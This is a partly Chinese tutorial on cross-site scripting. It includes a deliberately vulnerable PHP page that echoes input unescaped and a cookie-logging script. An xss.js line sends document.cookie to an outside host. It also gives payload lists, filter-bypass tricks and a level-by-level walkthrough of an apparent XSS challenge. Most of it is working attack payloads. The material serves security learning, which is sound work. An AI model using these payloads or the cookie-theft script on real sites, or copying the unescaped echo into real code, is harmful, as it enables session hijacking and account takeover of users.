1. XSS
1. Principle: Attackers inject malicious script code into web pages and wait for other users to browse
these web pages (or trigger other conditions) to execute the malicious code in them.
1.xss instance code:
test.html
<!DOCTYPE html>
<head>
<title>xss_test</title>
</head>
<body>
<form action="xss.php" method="post">
请输入你的名字<br>
<input type="text" name="name">
<input type="submit" value="提交">
</form>
</body>
</html>
xss.php
<!DOCTYPE html>
<head>
<meta charset="utf-8">
<title>测试结果</title>
</head>
<body>
<?php
echo $_POST['name'];
?>
</body>
</html>
get cookie script
cookie.php
<?php
$cookie = $_GET['cookie']."\n";
$cookie_f = fopen('cookie.txt','a');
fwrite($cookie_f,$cookie);
fclose($cookie_f);
?>
xss.js
<script>window.open('http://www.test.com/cookie.php?cookie='+document.cookie)</script>
xss is divided into 3 types:
reflection type xss
storage type xss
dom type xss
2.xss payload
<!-- 基本类型-->
<script >alert('xss')</script>
<script >alert("xss")</script>
<script >alert(/xss/)</script>
<script >alert('xss');</script>
<!-- 利用javascript伪协议 -->
<iframe src=javascript:alert('xss') ></iframe>
---------------------------------
<a href=javascript:alert('xss')>
<!-- 利用基本事件 -->
<img src="x" onerror= alert('xss')> //图片未找到
<img src="x" onload= alert('xss')> //图片正常显示
<img src="x" onclick= alert('xss')>
event | meaning |
---|---|
onclick | mouse click |
onchange | Content has changed |
onerror | When pictures etc. are not found |
onload | page load |
onmouseover | mouseover |
onmouseout | mouse out |
onmousemove | mouse over |
onchange is used in the input tag
<input type="text" onchange=alert('xss')>
3. Some bypasses of xss
--The attribute of the tag supports the javascript:[code] pseudo-protocol
利用空字符
常用字符:【空格】【回车】【Tab】键位符
应用场景:对JavaScript关键字过了过滤
-- scramble filter rules
1)大小写混合
<sCRipt>alert('xss')</script>
2)引号的使用
<script>alert('xss')</script>
<script>alert("xss")</script>
<script>alert(/xss/)</script>
3)<iframe/src=javascript:alert(1)>
4)双写
<scr<script>ipt>alert(1111)</scr</script>ipt>
2. Actual combat xss challenge tour
1. Question 1 (no filtering measures)
First, enter our most basic payload after the address, and the pop-up window
can also be
利用 iframe 标签的的 src 属性来弹窗
<iframe src=javascript:alert('xss')></iframe>
利用标签的 href 属性来弹窗
<a href=javascript:alert('xss')>ggtest</a>
这里就是超链接到了:javascript:alert('xss')
效果和浏览器直接打开这个地址:javascript:alert('xss')是一样的
这里还可以使用:javascript:alert(document.cookie) 来弹出当前会话的 cookie
img标签来弹窗
<img src=1 onerror=alert('xss')>
2. The second question
Attempt to enter the basic payload, see no
Right-click to view the source code, search for what we just entered, and see what has been filtered.
Copy the code, construct the payload, and in the input tag, first think of the onchange event
<input name=keyword value="<script >alert('xss')</script>">
" onchange =alert(111) <"
Well enough
"><script>alert(222)</script> <"
3. The third level
The same operation, look at the source code, construct the payload
to filter the angle brackets
" onchange=alert(1111) /<"
' onchange='alert(/111/)
4. The fourth level
<input name=keyword value="111">
" onchange=alert(555)<"
5. The fifth level
Filter the script
and filter the on event,
only use the javascript pseudo-protocol
"><a href=javascript:alert(111)>
6. The sixth level
Basic full filtering
Try case bypass
"><img sRc=x onError="alert(/xss/)
This does not work, look at the source code, filter on, try the capitalization of on, success
"><img sRc=x OnError="alert(/xss/)